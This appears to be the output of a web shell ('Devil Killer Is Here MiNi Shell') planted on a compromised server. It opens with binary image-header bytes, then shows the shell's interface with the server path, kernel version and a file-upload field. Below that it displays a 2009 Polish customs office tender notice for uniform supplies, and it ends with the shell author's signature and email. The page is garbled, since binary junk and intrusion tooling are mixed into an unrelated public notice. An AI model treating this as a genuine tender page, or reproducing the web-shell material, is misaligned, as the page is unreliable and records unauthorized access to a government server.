JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090717/114149-N-2009.html

<p class="kh_header"><b>Kraków: Postępowanie o zamówienie publiczne 
na dostawę składników umundurowania dla funkcjonariuszy celnych Izby Celnej w Krakowie
prowadzone w trybie przetargu nieograniczonego</b><br>
<b>Numer ogłoszenia: 114149 - 2009; data zamieszczenia: 17.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Celna w Krakowie , Al. Krasińskiego 11 B, 31-111 Kraków, woj. małopolskie, tel. 012 6290200, faks 012 4216757.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krakow.ic.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o zamówienie publiczne 
na dostawę składników umundurowania dla funkcjonariuszy celnych Izby Celnej w Krakowie
prowadzone w trybie przetargu nieograniczonego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Opis przedmiotu zamówienia.

1. Przedmiotem zamówienia jest podzielona na trzy zadania dostawa składników ubioru służbowego polowego oraz specjalnego dla funkcjonariuszy celnych Izby Celnej w Krakowie wykonanego zgodnie z opisami określonymi w załącznikach do niniejszej specyfikacji.

Zadanie 1
	Dostawa składników ubioru służbowego dla funkcjonariuszy Izby Celnej 
w Krakowie, wykonanego zgodnie z opisem w zał. Nr 1 do SIWZ - opis ubioru służbowego

Lp	Nazwa składnika ubioru służbowego	Jednostka miary	Szacunkowa ilość składników
1	Kurtka	szt.	69 szt. w tym 39 szt. dla mężczyzn i 30 szt. dla kobiet
2	Koszula w kolorze miętowym - długi rękaw	szt.	121szt. w tym 65szt. dla mężczyzn i 56szt. dla kobiet dodatkowo do magazynu150 szt. w tym 100 szt. dla mężczyzn, 50 szt. dla kobiet 
3	Koszula w kolorze miętowym - krótki rękaw	szt.	121 szt. w tym   56 szt. dla kobiet i  65 szt. dla mężczyzn dodatkowo do magazynu 50 szt. dla mężczyzn
4	Koszula w kolorze białym - długi rękaw	szt.	69 szt. w tym 30 szt. dla kobiet i 39 szt. dla mężczyzn dodatkowo do magazynu 100 szt. w tym 50 szt. dla kobiet i 50 szt. dla mężczyzn

5	Koszula w kolorze białym - krótki rękaw	szt.	69 szt. w tym 30 szt. dla kobiet i 39 szt. dla mężczyzn 
dodatkowo do magazynu 100 szt. w tym 50 szt. dla kobiet i 50 szt. dla mężczyzn

6	Czapka służbowa	szt.	39 szt. mężczyźni 
7	Kapelusik	szt.	30 szt. kobiety
8	Sweter typu polar z obszyciami	szt.	69 szt. w tym 30szt. dla kobiet i 39 szt. dla mężczyzn
9	Krawat	szt.	89 szt. mężczyźni
10	Krawatka	szt.	30 szt. kobiety
11	Półbuty	para	39  par mężczyźni
12	Szal polarowy	szt.	69 szt
13	Sznur galowy	szt.	69 szt.
14	Pasek do spodni	szt.	69 szt. 
15	Dystynkcje - Nasuwki na pagon	para	138 par

Opis przedmiotu zamówienie wg kodów CPV: 18.11.00.00-3 - odzież branżowa; 18.80.00.00-7 - obuwie

Zadanie 2 
	 
	Dostawa składników ubioru polowego dla funkcjonariuszy Izby Celnej 
w Krakowie, wykonanego zgodnie z opisem w zał. Nr 2 do SIWZ - opis ubioru polowego

Lp	Nazwa składnika ubioru polowego	Jednostka miary	Szacunkowa ilość składników
1	Komplet całoroczny (kurtka i spodnie koloru szarozielonego)	kpl	2 kpl. dla mężczyzn

2	Koszulka typu polo koloru szarozielonego	szt.	4 szt. dla mężczyzn
3	Koszulobluza z długim rękawem, koloru szarozielonego	szt.	2 szt. dla mężczyzn
4	Koszulobluza z krótkim rękawem, koloru szarozielonego	szt.	2 szt. dla mężczyzn
5	Spodnie polowe koloru szarozielonego	szt.	4 szt. dla mężczyzn
6	Podkoszulek z krótkim rękawem, koloru szarozielonego	szt.	4 szt. dla mężczyzn dodatkowo  do magazynu 50 szt. 
7	Czapka polowa letnia koloru szarozielonego	szt.	2 szt. dla mężczyzn
8	Czapka polowa zimowa koloru szarozielonego	szt.	2 szt. dla mężczyzn
9	Rękawiczki ochronne z powłoką antypoślizgową	para	2 pary dla mężczyzn
10	Buty letnie na grubej podeszwie (czarne)	para	2 pary dla mężczyzn
11	Buty wysokie na grubej podeszwie (czarne)	para	2 pary dla mężczyzn
12	Kamizelka ostrzegawcza (żółta)	szt.	2 szt. dla mężczyzn
13	Torba na umundurowanie (czarna)	szt.	2 szt. 
14	Dystynkcje - Nasuwki na pagon	para	4 pary 

Opis przedmiotu zamówienie wg kodów CPV: 18.11.00.00-3 - odzież branżowa; 18.80.00.00-7 - obuwie

Zadanie 3
	 
	Dostawa składników ubioru specjalnego dla funkcjonariuszy Izby Celnej 
w Krakowie, wykonanego zgodnie z opisem w zał. Nr 3 do SIWZ - opis ubioru specjalnego

Lp	Nazwa składnika ubioru specjalnego
	Jednostka miary	Szacunkowa ilość składników
1	Komplet całoroczny (kurtka i spodnie koloru czarnego)	kpl	1 kpl. dla mężczyzn

2	Koszulka typu polo koloru czarnego	szt.	2 szt. dla mężczyzn

3	Koszulobluza z długim rękawem, koloru czarnego	szt.	1 szt. dla mężczyzn
4	Koszulobluza z krótkim rękawem, koloru czarnego	szt.	1 szt. dla mężczyzn

5	Spodnie polowe koloru czarnego	szt.	2 szt. dla mężczyzn

6	Podkoszulek z krótkim rękawem, koloru czarnego	szt.	2 szt. dla mężczyzn dodatkowo do magazynu 150 szt. 

7	Czapka polowa letnia koloru czarnego	szt.	1 szt. dla mężczyzn
8	Czapka polowa zimowa koloru czarnego	szt.	1 szt. dla mężczyzn
9	Rękawiczki ochronne z powłoką antypoślizgową	para	1 szt. dla mężczyzn
10	Kombinezon jednoczęściowy koloru czarnego	szt.	1 szt. dla mężczyzn
11	Kamizelka narzędziowa nasobna koloru czarnego	szt.	1 szt. dla mężczyzn
12	Czapka typu dokerka koloru czarnego	szt.	1 szt. dla mężczyzn 
13	Pas główny parciany koloru czarnego	szt.	1 szt. dla mężczyzn
14	Buty letnie na grubej podeszwie(czarne)	para	1 para dla mężczyzn

15	Buty wysokie na grubej podeszwie(czarne)	para	1 para dla mężczyzn

16	Kamizelka ostrzegawcza zółta	szt.	1 szt. dla mężczyzn

17	Torba na umundurowanie ( czarna)	szt.	1 szt. 

18	Dystynkcje- Nasuwki na pagony	para	2 pary.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3, 18.80.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający na podstawie art. 45 ust. 2 ustawy Prawo Zamówień Publicznych odstępuje od żądania wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy spełniają następujące warunki:
a.	Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b.	Posiadający niezbędną wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
c.	Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d.	Nie   podlegający  wykluczeniu  z  postępowania o udzielenie zamówienia na podstawie art. 24 Ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych   (t.j. Dz. U Nr 223 poz.1655 ze zmianami)
2) 	Ocena spełnienia warunków zostanie dokonana na podstawie oświadczeń 
i dokumentów wymienionych w Rozdziale VI niezbędnych do przeprowadzenia postępowania i wymaganych w celu potwierdzenia spełnienia warunków udziału w postępowaniu oraz potwierdzenia, że oferowany przedmiot zamówienia spełnia wymagania określone przez Zamawiającego.
3)    Wykonawca musi wykazać spełnienie każdego z warunków.
4) 	Niespełnienie któregokolwiek z warunków spowoduje wykluczenie Wykonawcy 
z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	Dokumenty wymagane:
a.	oświadczenie o spełnianiu przez Wykonawcę warunków, o których mowa 
w Rozdziale V pkt. 1 
b.	w celu potwierdzenia spełnienia warunków, o którym mowa w rozdz. V pkt. 1a:
-	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie 
o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
-	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
c.	w celu potwierdzenia spełnienia warunków, o których mowa w rozdz. V pkt 1b:
-	wykaz wykonanych dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawie stanowiącej przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców,
-	dokumenty potwierdzające, że dostawy wyszczególnione w wykazie zostały wykonane należycie;
d.  w celu potwierdzenia spełnienia warunków, o których mowa w rozdz. V pkt 1c:
- informacji z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy nie mniejsza niż 80% wartości ceny oferowanej, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
2)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 1 b tiret 1, 2 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a.	Nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b.	Nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne 
i zdrowotne, albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
3)	Dokument, o którym mowa w pkt. 2 lit. a  powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt. 2 lit. b powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
4)	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 2 -  Wykonawca zastępuje je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
5)	Wypełniony i podpisany formularz ofertowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.krakow.ic.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Izba Celna w Krakowie al. Krasińskiego 11b 31-111 Kraków.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2009 godzina 10:30, miejsce: Izba Celna w Krakowie al. Krasińskiego 11b, 31-111 Kraków.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa składników ubioru służbowego dla funkcjonariuszy Izby Celnej 
w Krakowie, wykonanego zgodnie z opisem w zał. Nr 1 do SIWZ - opis ubioru służbowego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa składnika ubioru służbowego	Jednostka miary	Szacunkowa ilość składników
1	Kurtka	szt.	69 szt. w tym 39 szt. dla mężczyzn i 30 szt. dla kobiet
2	Koszula w kolorze miętowym - długi rękaw	szt.	121szt. w tym 65szt. dla mężczyzn i 56szt. dla kobiet dodatkowo do magazynu150 szt. w tym 100 szt. dla mężczyzn, 50 szt. dla kobiet 
3	Koszula w kolorze miętowym - krótki rękaw	szt.	121 szt. w tym   56 szt. dla kobiet i  65 szt. dla mężczyzn dodatkowo do magazynu 50 szt. dla mężczyzn
4	Koszula w kolorze białym - długi rękaw	szt.	69 szt. w tym 30 szt. dla kobiet i 39 szt. dla mężczyzn dodatkowo do magazynu 100 szt. w tym 50 szt. dla kobiet i 50 szt. dla mężczyzn

5	Koszula w kolorze białym - krótki rękaw	szt.	69 szt. w tym 30 szt. dla kobiet i 39 szt. dla mężczyzn 
dodatkowo do magazynu 100 szt. w tym 50 szt. dla kobiet i 50 szt. dla mężczyzn

6	Czapka służbowa	szt.	39 szt. mężczyźni 
7	Kapelusik	szt.	30 szt. kobiety
8	Sweter typu polar z obszyciami	szt.	69 szt. w tym 30szt. dla kobiet i 39 szt. dla mężczyzn
9	Krawat	szt.	89 szt. mężczyźni
10	Krawatka	szt.	30 szt. kobiety
11	Półbuty	para	39  par mężczyźni
12	Szal polarowy	szt.	69 szt
13	Sznur galowy	szt.	69 szt.
14	Pasek do spodni	szt.	69 szt. 
15	Dystynkcje - Nasuwki na pagon	para	138 par.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3, 18.80.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa składników ubioru polowego dla funkcjonariuszy Izby Celnej 
w Krakowie, wykonanego zgodnie z opisem w zał. Nr 2 do SIWZ - opis ubioru polowego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa składnika ubioru polowego	Jednostka miary	Szacunkowa ilość składników
1	Komplet całoroczny (kurtka i spodnie koloru szarozielonego)	kpl	2 kpl. dla mężczyzn

2	Koszulka typu polo koloru szarozielonego	szt.	4 szt. dla mężczyzn
3	Koszulobluza z długim rękawem, koloru szarozielonego	szt.	2 szt. dla mężczyzn
4	Koszulobluza z krótkim rękawem, koloru szarozielonego	szt.	2 szt. dla mężczyzn
5	Spodnie polowe koloru szarozielonego	szt.	4 szt. dla mężczyzn
6	Podkoszulek z krótkim rękawem, koloru szarozielonego	szt.	4 szt. dla mężczyzn dodatkowo  do magazynu 50 szt. 
7	Czapka polowa letnia koloru szarozielonego	szt.	2 szt. dla mężczyzn
8	Czapka polowa zimowa koloru szarozielonego	szt.	2 szt. dla mężczyzn
9	Rękawiczki ochronne z powłoką antypoślizgową	para	2 pary dla mężczyzn
10	Buty letnie na grubej podeszwie (czarne)	para	2 pary dla mężczyzn
11	Buty wysokie na grubej podeszwie (czarne)	para	2 pary dla mężczyzn
12	Kamizelka ostrzegawcza (żółta)	szt.	2 szt. dla mężczyzn
13	Torba na umundurowanie (czarna)	szt.	2 szt. 
14	Dystynkcje - Nasuwki na pagon	para	4 pary.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3, 18.80.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa składników ubioru specjalnego dla funkcjonariuszy Izby Celnej 
w Krakowie, wykonanego zgodnie z opisem w zał. Nr 3 do SIWZ - opis ubioru specjalnego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa składnika ubioru specjalnego
	Jednostka miary	Szacunkowa ilość składników
1	Komplet całoroczny (kurtka i spodnie koloru czarnego)	kpl	1 kpl. dla mężczyzn

2	Koszulka typu polo koloru czarnego	szt.	2 szt. dla mężczyzn

3	Koszulobluza z długim rękawem, koloru czarnego	szt.	1 szt. dla mężczyzn
4	Koszulobluza z krótkim rękawem, koloru czarnego	szt.	1 szt. dla mężczyzn

5	Spodnie polowe koloru czarnego	szt.	2 szt. dla mężczyzn

6	Podkoszulek z krótkim rękawem, koloru czarnego	szt.	2 szt. dla mężczyzn dodatkowo do magazynu 150 szt. 

7	Czapka polowa letnia koloru czarnego	szt.	1 szt. dla mężczyzn
8	Czapka polowa zimowa koloru czarnego	szt.	1 szt. dla mężczyzn
9	Rękawiczki ochronne z powłoką antypoślizgową	para	1 szt. dla mężczyzn
10	Kombinezon jednoczęściowy koloru czarnego	szt.	1 szt. dla mężczyzn
11	Kamizelka narzędziowa nasobna koloru czarnego	szt.	1 szt. dla mężczyzn
12	Czapka typu dokerka koloru czarnego	szt.	1 szt. dla mężczyzn 
13	Pas główny parciany koloru czarnego	szt.	1 szt. dla mężczyzn
14	Buty letnie na grubej podeszwie(czarne)	para	1 para dla mężczyzn

15	Buty wysokie na grubej podeszwie(czarne)	para	1 para dla mężczyzn

16	Kamizelka ostrzegawcza zółta	szt.	1 szt. dla mężczyzn

17	Torba na umundurowanie ( czarna)	szt.	1 szt. 

18	Dystynkcje- Nasuwki na pagony	para	2 pary.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3, 18.80.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com